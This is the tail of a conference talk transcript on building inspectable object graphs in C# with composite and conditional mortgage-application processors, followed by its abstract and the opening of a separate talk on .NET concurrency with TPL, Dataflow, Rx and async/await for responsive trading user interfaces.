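    // Deliberately public so the composed structure can be inspected in tests.
    public IMortgageApplicationProcessor[] Nodes;

    public IEnumerable<IRendering> ProduceOffer(MortgageApplication application)
    {
        // Invoke every node in order and concatenate their renderings.
        return this.Nodes.SelectMany(node => node.ProduceOffer(application));
    }
}

// The object-oriented predicate: encapsulates one rule about an application.
public interface IMortgageApplicationSpecification
{
    bool IsSatisfiedBy(MortgageApplication application);
}
```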
So basically it just encapsulates a rule about, in this case, mortgage applications. So you can pass a mortgage application into a concrete specification, and then if the specification is satisfied it will return true, and otherwise it will return false. So with that we can create a conditional mortgage application processor, and this is where we start simulating an if statement in our domain specific language. So that thing also implements I mortgage application processor just like before, and it decorates another mortgage application processor that we call the truth processor, but it also composes a mortgage application specification into it. And the way that we implement the produce offer method is then by saying, well, if the specification is satisfied by the application then I'm going to invoke produce offer on the truth processor and return that result back to the caller, and otherwise I'm just going to return an empty enumerable of I rendering. And I could even expand this to also add a false processor, so instead of just returning an empty enumerable I could call into the false processor and return the result of that if I wanted to do that, and that would be an if-else construct. And the interesting thing here again is that this has behavior but it also has data, because the specification and the truth processor are public fields, or they could be properties, that you could walk up to and actually inspect and figure out, do they actually have the right concrete class types that I expect them to have? And if you know that, you know how the overall composed system is going to look, so you can inspect those things, you can inspect the structure of a conditional like this. So this is also something that is very, very easy to unit test. So this is the test, and I don't suppose you can actually read this from the back, but it's one, two, three, four, five, six, seven lines of code, or seven statements, and this actually proves that for any implementation of those interfaces the behavior will be correct. So this actually proves that this particular component adheres to the Liskov substitution principle, which means that we can walk up to this general purpose thing and inspect its structure and know that it will always do the right thing. So when we have all those building blocks we can actually compose the graph structure that will replace the original transaction script, and the way that we can do that is, first I'm just going to unload this and I'm just going to fast forward, because what I've shown you so far is just the procedural version of this code base, and I'm just fast-forwarding into a version of that code base where I actually have added all of those nodes. But I didn't change the original mortgage application processor class here, because I just wanted to do a side by side implementation of the new thing so that we could actually compare the new and the old thing. So this is still the old thing, I just kept that so that we could compare them to each other. So the new thing would look like this: I have a class that actually composes that entire object graph, and let's just collapse that for a moment. So the composer has this single responsibility that it just composes a mortgage application processor that the caller can then go and call produce offer on. So the way that I actually construct this is that I start out by creating one of those composites.
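Before the composition walkthrough, a minimal sketch of that conditional as just described (the false-processor variant is left out):

```csharp
using System.Collections.Generic;
using System.Linq;

public class ConditionalMortgageApplicationProcessor : IMortgageApplicationProcessor
{
    // Public so the structure (which rule guards which processor) can be inspected.
    public IMortgageApplicationSpecification Specification;
    public IMortgageApplicationProcessor TrueProcessor;

    public IEnumerable<IRendering> ProduceOffer(MortgageApplication application)
    {
        // The simulated 'if': the guarded processor only runs when the rule holds.
        return this.Specification.IsSatisfiedBy(application)
            ? this.TrueProcessor.ProduceOffer(application)
            : Enumerable.Empty<IRendering>();
    }
}
```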
So here's my composite mortgage application processor and I just start assigning an array of polymorphic types, all things implementing I mortgage application processor, to it. So the first thing I assign is that date and location mortgage application processor that I just showed you, which basically just addresses these two lines of code. It does the exact same thing, but now we actually have a structure where we can walk up to this array afterwards and have a look and say, is the date and location mortgage application processor the first element in this array? Yes it is, now we know it actually does the right thing and we can move on and do that with all the other things. And as you can tell, I have that first if statement occurring down here where I say, well, if there are any additional applicants, then I'm going to print out the information about each of the additional applicants for this application, and you can see that happening down here. So I have this conditional mortgage application processor that I told you about, which simulates an if statement in this higher level language, this domain specific language that we're kind of evolving here, and I'm saying the specification is something called an any-additional-applicants specification. We can just move to that one and you can see it encapsulates the same test as before, so additionalApplicants.Any. So it seems like a very enterprise way of doing that, but there are some very interesting benefits that we can derive from doing this. And then we assign the truth processor here and say, well, that is then a processor that will actually print or render all of those additional applicants. And the interesting thing about this is I am not really invoking any code here, I'm just building up a data structure, and a data structure that just so happens to also encapsulate some behavior, but basically I'm just building up a data structure, and I could actually write a unit test that tests that this is the first node in that nodes list and this is the second node and this is the third node and, you know, everything happens in the correct order. So that would be possible, and I actually do have a test in here that does that, but it looks exactly like this so it's not very interesting to look at. So I can run this code now and we can start by switching back to those offer letters and see that they don't really look like they've changed much at all, which we wouldn't really expect either, but now we have full test coverage of this, so I can actually try to see if I can run the tests here, and I actually ended up writing 137 unit tests, which may actually seem like a lot, but I did some other things as well, and I actually have full coverage of this system now. Alright, so that actually takes care of the unit testing aspect of this problem, so what we are doing here from a unit testing perspective is something called structural inspection. Structural inspection basically goes like this: if you can prove with a couple of unit tests that your general purpose components always work in the intended way, so that would be your composite and your conditional and so on.
If you can prove that they adhere to the Liskov substitution principle by just passing in some mock instances of whatever it is that they compose, you know that they always work in the same way. So that means that now when you encounter one of those things you know it always does the right thing, so you just need to inspect its structure to know that it's actually composing the right things. And then you can unit test all of your specialized building blocks as well and know that they do all of those interesting things, and then you can also maybe test the composition, the overall composition, or somehow define what that overall composition looks like, and then you know when you do that that the entire system will work as intended. So that seems or sounds very enterprisey, but the very, very interesting thing of doing this is that each of those small components that you unit test only requires a couple of unit tests to test individually. So instead of having that combinatorial explosion of test cases that you would have to do to cover this entire system, you just have an additive system where you say, well, if I need to add a new if statement I just need to add one new test case, and then maybe a test case that tests that the structure is still as you expect it to be. So it's much more linear in the way that you can actually deal with complex systems. So it may seem like a little bit of an overkill here for my simple sample code, but this is really something that allows you to scale into something that's much more complex. So that takes care of the unit testing part of that problem that my original customer had, but it turns out that we can actually do some interesting things now because that graph is also a representation of data. So what I actually have that command line utility do, in addition to just running the graph, is I actually had it dump an XML file. So I just used the data contract serializer to serialize this entire graph to XML, and it's not pretty at all, but it's all there. All the information needed to reproduce this object graph is there. All the data about the structure of this graph, with the conditionals and what the location provider is and everything, it's there for everyone to see. And obviously you can't ship things like this to your business owner, but what you can do is you can take that and maybe, you know, produce a little style sheet out of it. So let's just load that in and say, well, let's start matching on that composite thing, and then we can have matches on all the concrete leaf nodes like the date and location mortgage application processor and so on. And also you can match on all the concrete specifications and the conditionals and so on. And we can use that to print out another markdown file. So let me just pull that one in. So now we get a markdown file that looks like this and it's, I'm just waiting for it to render. Oh, here we go. So the markdown file pretty much just says, well, do all of this, because the first thing is a composite and it just says, well, do all of this. Maybe it should say in order, in sequence. So it says print date and location, print greeting, print application details headline, blah, blah, blah. It even handles the if statement. So it says, well, if there are additional applicants then print details about the additional applicants. So you can pretty much just take this and ship it to your business owner and say, well, this is what our code does at the moment.
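The XML dump that the report is generated from can be produced with the DataContractSerializer mentioned above. A rough sketch, assuming the node classes carry the [DataContract]/[DataMember] attributes the talk mentions, the known-type list is illustrative, and `graph` is an already composed IMortgageApplicationProcessor:

```csharp
using System.Runtime.Serialization;
using System.Xml;

var knownTypes = new[]
{
    typeof(CompositeMortgageApplicationProcessor),
    typeof(ConditionalMortgageApplicationProcessor),
    typeof(DateAndLocationMortgageApplicationProcessor)
    // ...plus every other concrete node and specification type in the graph.
};
var serializer = new DataContractSerializer(typeof(IMortgageApplicationProcessor), knownTypes);

// Walk the graph out to XML; an XSLT (or any other transform) can then turn
// that file into the markdown report shown above.
using (var writer = XmlWriter.Create("graph.xml", new XmlWriterSettings { Indent = true }))
    serializer.WriteObject(writer, graph);

// The same file can later be read back into a runnable graph.
using (var reader = XmlReader.Create("graph.xml"))
    graph = (IMortgageApplicationProcessor)serializer.ReadObject(reader);
```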
You know, instead of using a lot of mental energy and time of doing this, this is just something that happens in less than a second. You can actually just do that and just say, well, well, here you are. Here's your documentation. So sometimes when people talk about, well, when I talk about code as documentation, I mean something like this. It's kind of interesting that you can do that. So you can take that graph and you can serialize it and you can transform it and then you can distribute whatever you transform. So you can transform it into markdown as I did or transform it into PDF or maybe HTML even, but you don't have to serialize it. You could actually just render it on the fly. The reason why the data contracts serialize it can do this thing is because it can walk the graph. So you could write your own code that just walks the graph in memory and instead of producing XML or some sort of thing that sits on a file system, you could just walk the graph and then, you know, just dynamically spit out HTML. So if you have a web-based system, you could pretty much just create a dynamic web page that you could say to your business owner, well, you know what, just go and visit this web page and it will always tell you the business rules that are running on the system at that particular moment. And you can make it as explicit and detailed and, you know, nice to look at as possible. I was just a little bit lazy so that's why you just got that tree-like structure there. All right, but wait, there is more. Because one thing is that you can render and interpret this graph, but you don't have to just passively look at this graph. You could actually, now you have a graph. Well, you could change it. So let's try to do that. So imagine that some of our business owners come by and they say, well, you know what, we just made a deal with a real estate company so that if we can refer customers to this real estate broker, we get a referral fee. So it would actually be pretty nice because we know a lot of our customers are looking to sell their current property to finance the new property that they're going to buy. So when we know that, it would be very, very nice to actually print in their offer letter some information about that they should choose this particular real estate broker over other real estate brokers. But if they're not looking towards selling their current property, there's no reason to bother them with that because that would just seem unprofessional. So what we can do, and I'm not saying that you should do all your programming in XML because that's actually pretty horrible, but you can actually just take and mutate or modify this graph here. So what I have here, I just added a little note saying, here's another conditional mortgage application processor. That's our if statement, if you will. And the specification is even one that we have before. This current property sold as financing specification as it's called. That was the same specification that I used up here to print out some other things. So that's actually a component, you know, reusable building block that I already have. So I had two reusable building blocks here already in place. So the only thing I actually need to do is just to create a new component, I call it realty-opsell mortgage application processor. So that was actually the only new leaf note I needed to create in order to match that new business requirement here. And I could write a couple of tests. 
I think I wrote three or four unit tests for that thing, and then that was actually done. And I just added that. And now everything is actually good. So I'll save this, and I'll run this command line application again because what it does actually is if it finds this graph, so the XML file at the place where it's running, it's going to deserialize that graph and actually use that instead of the hard coded graph that I showed you at the beginning. So we should expect that if we go back to first the report, it gets a new if statement here at the bottom, and it actually does. So it says, if applicant will sell current property to finance new property, then print an offer of additional real estate services. So let's check out and see whether that actually works. So here's an application where the applicant actually wants to sell the current property. So it says, current property will be sold to finance new property. We had that before. So we would expect if I scroll down that this offer about real estate brokerage services actually sits there, and so it does. So it says, do you need help selling your current property? Then blah, blah, blah, blah, blah, blah. And another scenario here is one where we don't have anything about selling the current property to finance the new property. So we wouldn't expect that real estate broker offer to sit in the bottom of this offer page, offer letter, and it doesn't. So this actually turns out to work pretty well. All right. So I just manipulated this graph on XML. I just manipulated the persisted graph because I think that was probably the easiest thing I could do in the time frame that I actually had because if I needed to build a complete UI system and so on, you wouldn't really be able to understand or it would be very difficult for me to get across what it was that I was actually doing. So I'm not saying that you should begin to program an XML again. That was a fact that, you know, ended more than 10 years ago. So I'm not saying we should go back to that. But it is possible, and it's just to illustrate how easy it actually is to manipulate a graph once you have a graph because it's just data. It's also behavior, but the behavior is contained in the type and you have information about the type. But what you can actually also do is you can just manipulate that graph in memory on the fly if you need to do that. So imagine if you had that report page where the business owner could go and have a look at what do our current business logic actually look like. Imagine if you had a web page out of that. Imagine now that you actually put buttons besides each of those nodes where you can say, well, reorder, delete, or move, add new things. And you can actually turn this into some sort of rules-based engine. I'm not saying that's always interesting, but it's just interesting to know that that is actually something that's possible. Right. All right. So if I were to do something like this, I haven't built a system exactly like this, but I've done lots of systems that uses this technique of building object, polymorphic object graphs like this, complete with specifications and everything. But if I ever had to build something that had persistence built in, I would probably decouple persistence from the implementation because I don't think it's, I don't think it looks very nice that data contract serializer thing. And I also had to put data member and data contract on the classes to actually enable that. 
But decoupling persistence from implementation is just more work; it's definitely possible. The other thing I would want to do is to create my graphs as immutable graphs. So instead of mutating an existing graph, what you would do is take a copy of an existing graph into a new graph, but along the way when you copy it, you slightly change something. You add a node, remove a node or whatever. So if you're interested in how that would look, I do have a long-running, semi-long-running open source project called AutoFixture, and the kernel of AutoFixture actually works this way. So it has conditionals and it is an immutable graph that you can sort of, you know, project into new versions of the same graph and so on. So this is actually something that works. And it's really, really great for dealing with very, very complex rules systems. All right. So in summary, if you have one of those transaction scripts, extract an interface from your entry point method, that was that method called produce offer in this case, but extract an interface from that entry point method and then create all your nodes to implement that specific interface, including those general purpose building blocks like your composite and your conditionals and whatever else you need, and then you can just go ahead and party on the graph and do all of those fanciful things that I just showed you that you can do. So that's pretty much it. I have two and a half minutes left, so I don't have much time for questions. But do stick around if you have questions now, and otherwise I'll be at the conference for the next couple of days if you have specific questions, so just come by and stop me. I also have a talk on Friday called Big Object Graphs Up Front, which is just an hour of, you know, revelling in how great and fun it is to create big object graphs. So a very, very geeky talk there. I'm also the author of a book called Dependency Injection in .NET, which is kind of related to this when you really boil it down. So the code for this is actually available on GitHub. It's on github.com slash ploeh slash loan. So you can go and look at it if you think that's interesting. Otherwise, I have all my contact information there. So if you have a question and you don't get to ask that question of me here at the conference, then you can try to contact me in this way. I actually do have one and a half minutes left. So I will take one or two questions depending on how long it takes to answer them, if you have any. So any questions? You are just ready to go home and, yes, there is one question. How do you manipulate the immutable graph, do you use something else, or what they call projections or lenses? So a lens is just a way to make a functional program more readable. For how I do an immutable graph, I'm still looking for a very elegant way of doing that. But if you look at the AutoFixture code base, you will see some semi-inelegant ways of doing that. But it's basically something that involves lots of recursion. So very, very functional actually. And I think it's actually tail recursive, even though that doesn't really matter in C sharp. But I just thought that it could be fun to do that. Yeah. But it has something to do with calling an extension method and passing in some, you know, funcs into that one. So it could be nice.
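As a rough illustration of the kind of copy-and-modify projection being described (this is not AutoFixture's actual implementation, and a fully immutable design would use constructor-injected, read-only nodes rather than the mutable fields sketched earlier), one workable shape is a function that copies the graph while making a single change:

```csharp
using System.Linq;

public static class GraphProjections
{
    // Returns a new graph that is a copy of the original, with one extra node
    // appended to the root composite; the original graph is left untouched.
    public static IMortgageApplicationProcessor AppendToRoot(
        IMortgageApplicationProcessor graph,
        IMortgageApplicationProcessor extraNode)
    {
        var composite = graph as CompositeMortgageApplicationProcessor;
        if (composite == null)
            return new CompositeMortgageApplicationProcessor
            {
                Nodes = new[] { graph, extraNode }
            };

        return new CompositeMortgageApplicationProcessor
        {
            Nodes = composite.Nodes.Concat(new[] { extraNode }).ToArray()
        };
    }
}
```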
And I think you could probably express it in a nicer way in F#, if you would do that. But it's possible. I hope that answers your question. All right. Okay. So I think that's about it. So if you have any other questions, then come and ask me afterwards. But I want to thank you for coming, and I hope you have a nice evening. Thank you.
|
Some languages (most notably LISPs) exhibit a characteristic called Homoiconicity, which means that code is data and data is code. This makes a language very powerful because a program can inspect and manipulate itself. C# isn't a homoiconic language, but using formalized object graphs, it's often possible to formulate a problem in such a way that the program opens itself up for inspection and manipulation - essentially faking Homoiconicity in parts of the code base. This opens up many powerful options, including easier unit testing, self-documenting systems, run-time changes to program structure, and more.
|
10.5446/51474 (DOI)
|
So anyway, my name is Michael Hyatt. I'm glad to be here and that everyone showed up for my talk here. I work for SunGuard Consulting Services. There's global services up there. We changed our name again on June 1st back to Consulting Services. And what I want to talk about today is a number of different things that I've been doing with a lot of the frameworks for concurrency and parallel programming.net. So this first opening slide here has got a little bit of the intro to some of the things we're going to look at, but I'll give a little more detail here. So I'm going to run, I'm not doing this full screen because of all things, it turns out that you can't swipe between a PowerPoint presentation and another desktop with Mountain Lion. But I got the new one, Mavericks, yesterday, but was tempted to install it, but it said virtual machines don't run on it yet. So I was like, eh, I can't do that. So anyway, what I do for SunGuard is I run a Capital Markets Advanced Technology User Experience group out of New York City. So I do a lot of work with a lot of investment banks, sitting on trading desks, working, building responsive trading applications for traders in these environments. What I have today is a lot of the stuff that I've built over the years, I've kind of been consolidating into some presentations and kind of giving these and revising it. And to be honest, this one turned out to be completely rewritten from when I gave it three weeks ago at another users group. So we'll see how it goes, but it does a lot more than what we were doing before. But I build trading desktops for these banks. I also do a lot of stuff with seamless applications and natural user interfaces and different types of things. But Daily Bread and other kinds that get around to building these desktops that can support a lot of transactions coming in and updating the screen very frequently. And this involves over the years, a lot of nice things have been added to.NET to help you out with these problems. So what I'm specifically going to talk about are the concepts of concurrency and responsive user interface in.NET. Various combinations of Task Parallel Library, Dataflow, Rx, and Async await. I don't think I'm going to try not to drive too much into the theory of any of these. It's not a how did we implement this in the framework kind of talk, which it was a couple of weeks ago. And then everybody gets mad at me, well, we didn't really get to some good stuff. So this is primarily going to be demo driven, some slides, some talks about how some of the stuff works, but shows you how you can use these different things to get things done in your application. And there's some patterns for each of these. So I was talking about patterns and various capabilities, but we'll look at some of these common patterns for each library and how each library supports concurrency and responsiveness in your applications. There's also one question I always got over the years too is Dataflow versus Rx, where do you use one or the other? Well, I finally figured that out like two weeks ago. It's kind of part of the getting the presentation retool because it changed the way I thought about everything, which is kind of nice when you have an epiphany like that. And I'll show you this and then anything else that you want to talk about through this. So this is why I was kind of asked like, who's done much programming with task parallel library? Can you raise hands? 
Okay, it's a few people, not a lot, which surprised me because this stuff is so neat, especially if you're a guy trying to do threads over the years and years and years trying to deal with this. It's a small amount, so I'll cover some of the concepts in Task Parallel Library to show how this works, because these things build up on each other. Anybody use Dataflow? Good. That's kind of the bread and butter of what I do and a big part of this demonstration. The end demonstration is mostly Rx and Dataflow that we'll be looking at. Reactive extensions? Okay. Those who raised your hand, have you used it for anything other than tracking the mouse and stuff like that? Okay. Just one, from what I could tell. It's got some really kind of neat things in it that can help you out with these types of apps. Let's see, what else is there? Async await. Anybody programming regularly using that? I've seen that, because it's a, what, I always get confused if it's .NET 4.5 or C# 5. I can't use it where I'm working right now, in an investment bank, because we just went to .NET 4, so I can't use that, and I'm finding out the limitations of TPL there. I've been doing 4.5 programming for a long time. This is the gist of the things that you'll use in a concurrency toolkit. These are the things that are built into the framework. There are millions of, well, not millions, but I looked over the last couple of weeks to see how many NuGet extensions there are for every one of these libraries that you can go and get and help yourself out with. The Task Parallel Library, I've got some bullets here. It abstracts units of work for concurrency. I like to think in that unit of work type of model because, I'll go into a little more depth on this, but it provides you basic flow of data through your application. A lot of times when you're building applications and you want to do something in the background, it's implicit to think it's done in the background, I'm just going to put it on a UI. Well, a lot of times you want to take it from a background task to another background task to another background task, do a whole bunch of different things, and then put it up on the UI. It starts to give you this type of capability, which threads do not. So it uses the concepts of promises and continuations, and I guess the .NET world calls them futures; promises is kind of the JavaScript world. Who's familiar with promises? Okay. We'll talk about that. Because to me, tasks are just promises. So async await turned out to be compiler-based support for some of the semantics in TPL. You can go to Lucien's talks and he'll give you gory details on state machines and all kinds of different things on how async await works, and it does a lot of different things. But there is some of it in some of my examples. We'll see how it comes in. Dataflow gets into agent-based programming, where you start thinking of your system in terms of messages, and then pieces of code that the messages can be routed to. Each message contains data, and then they get routed to these agents where you can say, you know, run this function on this data, run it on this many threads, you know, and then when you're done, maybe pass it down to another agent, send it to another agent. And this is the ultimate way, if you ask me, to get concurrency in your .NET applications, whether it's a UI or server-side and stuff like that. It just makes a lot of things very easy. The reactive extensions started out years ago as, you know, an implementation of the observable pattern in the .NET framework.
So basically what Rx ends up doing is, you know, you can take any IEnumerable, make an IObservable, and then from that, as new events come in, you can call a function to have code executed on them. And that's the very, very basic part of that Rx world. There's a lot to it. I'll show you some practical things in the context of, you know, getting to use it. Parallel extensions. Those have been around for a while, you know, parallel for, Parallel LINQ. Who's done Parallel LINQ work? A couple. Yeah, it's pretty neat. I'm not going to focus a lot on that in this talk, but, you know, we'll see it in some demos. It's great for parallelizing for loops. And there are some problems with parallel for loops, with synchronization and pulling data back in order, which it provides nice constructs for. We're not going to get into it; it was in here originally. So, and I'm going to be honest, I like to summarize all this. All this tech that's in there, it's just a means to an end: the user's experience with the application. Okay. How responsive is the application? Does the application get data to the screen for the user to see in the time that it's needed? You know, I always see these metrics where, like, you know, these trading desktops need to support thousands of messages per second being put up on the screen. Okay. For the trader to be able to tell what's going on. I've never seen it that fast. And two, no human can process the information that fast anyway. So, but is it a nice technical challenge to try to solve that problem? Yes. But there are practical problems, and practical ways to solve them, which I'm going to show you: the main demo stepping through all this is a practical way of using all this stuff to solve that and provide a good user interface. And it keeps the UI responsive. So, let's go over. Well, actually I have a flow chart here. Why don't we get that out? In that application, each one of these blocks is a piece of functionality that needs to happen in a trading application, if you ask me, kind of as a reference architecture. You know, you're going to have a lot of streams coming in, and you have to capture all of those. And then we're going to batch them together in little blocks instead of processing every one, every single event, all the way to the screen every time. We'll capture them in the little blocks. Once we have blocks, we'll collapse the data, so it's conflation, down to just the changes that are needed. Then we'll flow it down the network to a distribution point where it's going to say, we're going to take those changes that came in from the market exchanges, let's say, and send the data this way because we're going to go update the screen right away with that. A lot of times in these types of applications, I got data in from the market or back end systems, and I now have to go look up some more data because they might be representative codes. I need to look up data if it's not in the system, bring it in. So there's other work to be done.
But when that's done, you hop on over and you follow the path over here in Richmond, go down through flattening that all back out, then rebunching up for user interface aggregation for buffering to the display and then getting up onto a WPF or Win8 sample application, which I've got a Win8 sample on this. So let's look at my tryout of bad trading desktop. It's not really a trading desktop. It's just a program that I've run. I wrote over the last month to try to demonstrate different ways of going and working with performance in your UI. And this actually does not do any threads or concurrency. Just trying to figure out how to change what's on the display effectively with your XAML. So this has 1,000 squares pretending to be cells on a grid. In theory, we think of this maybe as securities and then the attributes, price, all this kind of stuff. So this grid over here then has different ways of running this demo. The typical one, what this demo goes, it's going to generate, I forget how many numbers of thousands of, actually, it's going to loop 100 times and change either the text or the color of the cell 100 times. And it's going to tell you how long it took to do it. And it provides an ability to do it neither using data binding or a more direct model that's changing like the color property on the brush that's in the UI element without data binding, which is a preferred way, whether you want to change the text and color. So there's all kinds of different things. But let's just say we're going to go change every one of these thousand cells, the text and color using data binding on a high priority background thread. You can probably guess what's going to happen with this. It looks like nothing's happening as I hover over the other buttons. You don't see it highlighting or anything like that. Then you wait around for seven seconds and it went to 99. You didn't see this display, it told the display to show 0, 1, 2, 3, 4, and every one of those cells but just jumped right to the end. Well that wasn't a very satisfactory thing to do. So if we change this around a little bit, and I've been needing to refresh this here, and let's go down and change the text and color, but let's remove data binding and see how long this takes. And I'm going to use a normal priority thread. So you can see that now this is going in and a lot better experience kind of going through that. And while that's running, the other buttons highlight, you can move the window around and different things like that instead of being completely blocked. So this is kind of the end state of that application is let's not use data binding. You see here, this took three seconds and it's technically a lot faster than that at least compared to the data binding. I've seen the data binding on this take like 17 seconds or something like that but this stuff usually runs pretty fast. That's generally one of the problems. I've walked in the clients where I've been asked to redesign their trading grid because it takes eight minutes to start with no responsiveness in the UI. Those are just sitting there binding things for 20,000 rows and not paying any attention to what's going on. So get rid of the binding, know how many things you're updating on the display, only change what you need to change on the screen. So that's kind of the first way is how not to do it. The last part's parted away in doing this. So let's go over to the next demo here. It's all parted as one application is a better trading desktop. 
This is actually running the code of the example that will walk through this entire time through this. And I'm going to start this and what this one's going to do, I forget to count, I think right now it's going to generate 5,000 events over five seconds and then update the display based upon what's coming in. One number for the value to sell and different colors depending on what's going on, which we'll see. So you see this is going pretty good. So this should come up, get them all done. Five seconds, I might have it on 10,000 or maybe we're getting the bug here again. So but it's updating pretty well. So let me, I noticed this due to that once last night. It's always, demo always gets you at some point. So let's start that again and it should stop in five seconds. But this is handling this pretty well. So and it's updating all these cells and to be honest, it's still more than any real person can try to try. I'm working with more different metaphors like with these desktops now like just show what the trader is currently tracking and only show them the updates on that and different you know niceties like that. So so just going through. So this is we're going to work to this because this is going slow right now. We're going to crank the speed up on this as we go through the talk. So I'm going to turn that off. Okay, is there anything, any questions please feel free to ask. So the TPL overview in a nutshell, okay. This to me are promises there basically it's work that's going to be done in the future. It may be on a thread, it may not be on a thread. It's going to be done in the background or in the foreground when you're not noticing it happening. They have results. That's what's kind of neat about it. That what makes it a promise. I'm going to go do something and at some point in the future, I'm going to have a result for you could be void, but usually a lot of most of the time usefully it's a piece of data. Okay, and that's returned through a result property and the tasks have state like waiting for activation running completed. If you tried to get a result from a task that isn't completed yet like through the result property it blocks until it's done. That's one of the semantic things you have to worry about when you're doing this. And one of the big tricks becomes, you know, especially with threads, but tasks make this very easy is once that works done, since you're doing it and I don't know when you're starting it, I don't know when you're done with it, how can you let me know that it's done so I can get the result? Well, you know, on threads you were like programming, you know, wait events or shared buffers, the signal or a callback and you got in all these kind of race conditions. Well, you know, you don't have to do that with tasks. Tasks have a continue with method. So you call a delegate when it's done. But in general the concepts, and we're going to jump into a TPL example here in a second, it makes us a lot simpler. Tasks represent the unit of work. They have continuations as I like to call them. It's fairly common, you know, continue with, continue when all different types of constructs around these, let you basically go and build compositions of work. Got to do this, when that's done do something else, when that's done do something else, and then when eventually it ever meets the final end, give me the result of all that. And keep me asynchronous and responding on the UI and all that kind of stuff while doing it. 
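A minimal sketch of that promise idea (not the talk's demo code): start some work, attach a continuation instead of blocking on Result, and compose further from there.

```csharp
using System;
using System.Threading.Tasks;

class PromiseBasics
{
    static void Main()
    {
        // A task is a promise: work that finishes later and carries a Result.
        Task<decimal> quote = Task.Run(() => ComputeQuote());

        // Reading quote.Result here would block; a continuation does not.
        Task done = quote.ContinueWith(t =>
            Console.WriteLine("Quote ready: " + t.Result));

        Console.WriteLine("Still free to do other work while the quote is computed...");
        done.Wait(); // only so this console sample doesn't exit before the continuation runs
    }

    static decimal ComputeQuote()
    {
        Task.Delay(500).Wait(); // stand-in for slow work (e.g. a market data call)
        return 101.25m;
    }
}
```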
There's schedulers, which we will look at; basically any tasks created always run on a scheduler, which defines the scheduling of those tasks relative to each other on a thread pool or whatever. And I have some examples of how to change that around. Synchronization context: you should be familiar with the UI context. That's the big thing, get it back on the UI, but you may also want to keep it in some other context, so there's full support for this. Cancellation, big topic, won't get into it too much in here, but it just ends up being: I've created 100 tasks, they're all out and running, now I need to stop them all because I'm shutting the app down. Well, how do I do that? Well, with threads it was a nightmare, right? You know, thread abort, set global flags, wait for things to finish, signal them to finish. With tasks you can do it real easy with this stuff. And then aggregate exceptions. Always was a problem. If I started 10 threads and three of them threw exceptions, how do I get that figured out? So there are nice structured concepts in this for that. So, the TPL: what, .NET 4 and on, I don't know, maybe it was 3.5, I forget, I think it's just 4. It's in these namespaces. It's more declarative than threads, and to be honest, like, WinRT Windows 8 doesn't even have threads. Anybody done Windows 8 programming, Windows RT? Yeah, that was an experiment I was doing with putting this over to this Windows 8 app, and I tried to do a thread sleep once, and it was like, there's no threads. Frankly, they don't even expose threads to you. You have to do everything through tasks. Okay? It's all different. But this is a good thing, to be honest. So, it took me a couple minutes. I thought, well, how do I do that? Well, there's good content. And they can wrap a whole bunch of other things. And just as they provide concurrency, if you've done the asynchronous programming model, IAsyncResult, or the event-based programming model, you can actually convert those to tasks. Because the problem with those is they're not very orchestratable. So, you know, like, I started async programming a lot with, you know, Silverlight, and every web service call is async, and you go, well, I need to make that call when that call is done. I need to call another web service because I need data out of that web service to pass to this web service. Next thing you know, you're going insane with IAsyncResults and trying to handle errors. Well, you can just wrap those up nicely in a task, and just kind of orchestrate the stuff going together. And they have status, like I was saying, you know, waiting to run, running, completed. It's very important with all these libraries, TPL, async await (though we won't use async await that much), Dataflow, and Rx to a lesser extent, to understand the concept of completions. Anybody worked with that concept? If you haven't done TPL, then you probably haven't really gotten into completions, but completions are a construct built into tasks that are, in a way, I guess, similar to having a wait handle. There's a flag on a task called completed, which basically says whether the task has run to completion yet. And you can use that completed variable to tell if you're done, to wait, or as a signal to move on and do some more work at the end. And like I said, it's not threads. I could be wrapping an EAP thing. The data came back. Well, the framework sets the completed state, so you can go and continue on with things.
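A sketch of wrapping an older event-based (EAP-style) API in a task via TaskCompletionSource, so it can be orchestrated like any other task. The QuoteService type, its event, and the argument properties are hypothetical stand-ins, not a real library API.

```csharp
using System.Threading.Tasks;

static Task<decimal> GetQuoteAsync(QuoteService service, string symbol)
{
    var tcs = new TaskCompletionSource<decimal>();

    // Hypothetical EAP-style API: raises QuoteReceived when the data comes back.
    service.QuoteReceived += (sender, args) =>
    {
        if (args.Error != null)
            tcs.TrySetException(args.Error); // surfaces later as an AggregateException
        else
            tcs.TrySetResult(args.Price);    // marks the wrapping task as completed
    };
    service.RequestQuote(symbol);

    return tcs.Task; // callers can ContinueWith, WhenAll, await, and so on
}
```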
Well, the framework sets the completed state, so you can go and continue on with things. So, there's sync contexts. If you're familiar with synchronization contexts and using them directly, which is really the kind of the way to do this, that stuff is, you'll see that you use the word post a lot, synchronization context, post. If you're on a dispatcher UI that's actually putting something on a dispatcher, the data flow stuff completely uses post semantics. So, if you're used to that stuff, data flow will look a little familiar to you. There's different synchronization contexts. Primary one is dispatcher sync, the thread pool. So if you're running something in the thread pool, a task in the thread pool, you need to get something on the UI, you can just passing a variable to the dispatcher sync context, just go up and tell it and it'll run automatically on that. So, got task schedulers. They kind of define the quote unquote, air quotes, thread pool semantics. But basically, tasks in.NET right now by default go to the thread pool. If they're considered normal tasks, long running tasks are not in the thread pool. But you can write your own schedulers. The task scheduler in.NET puts them in the thread pool if they're normal tasks. But you can write your own. I wrote my own in one of these to show an example of mediation, which we'll look at. So, we're going to look at a couple of quick TPL examples here. The one I like to demonstrate is scatter gather, which is a common pattern like in a training app or doing other things. A lot of times your app starts up, I got to go get data from, say, Reuters, I got to get it from Bloomberg, from all these different sources. And then once that they're all in, do some more work. But in the meantime, I want to do some other stuff on the UI. So this is pretty straightforward with TPL to set up this type of contract versus doing multiple threads. So let's go over and bring up our GUI again here. And I'm going to go to scatter gather. And there's five different examples of this. So I'm going to show some code here real quick. Let me bring this up. So if everybody can read that code, okay, big enough? I think I thought so. This first example here, execute naive. This is creating two tasks. Task.delay creates a whole other task who doesn't start running until the time frame in milliseconds that you specify. So it's a neat way. It's kind of like thread.sleep, except it's not immediately sleeping that thread. It's starting another task which will not start for that amount of time. And then you can go do some things. So this puts them in array. I've got two tasks, task one, task two. One will not start for 2,500 milliseconds. The other one, 5,000. Then I use the task.waitall function, static function, passing in that array. So what this task.waitall does is it waits for the completed variable on each task in that array passed in to be true. And then it continues on work. So without writing all these auto reset events, I just did this very nicely right here. So if we go over to here, we'll run this. And I say this is naive because it's blocking. You'll see the button's not changing back until 5 seconds in, and we're done. That blocked. Because task.waitall, the thread coming through here executing this, this blocks that thread. So that's probably not something you want to really do. So there's a better example of this. This is the execute better function. And this is showing a little bit more. Same thing as before, two tasks, one running the same amount of times. 
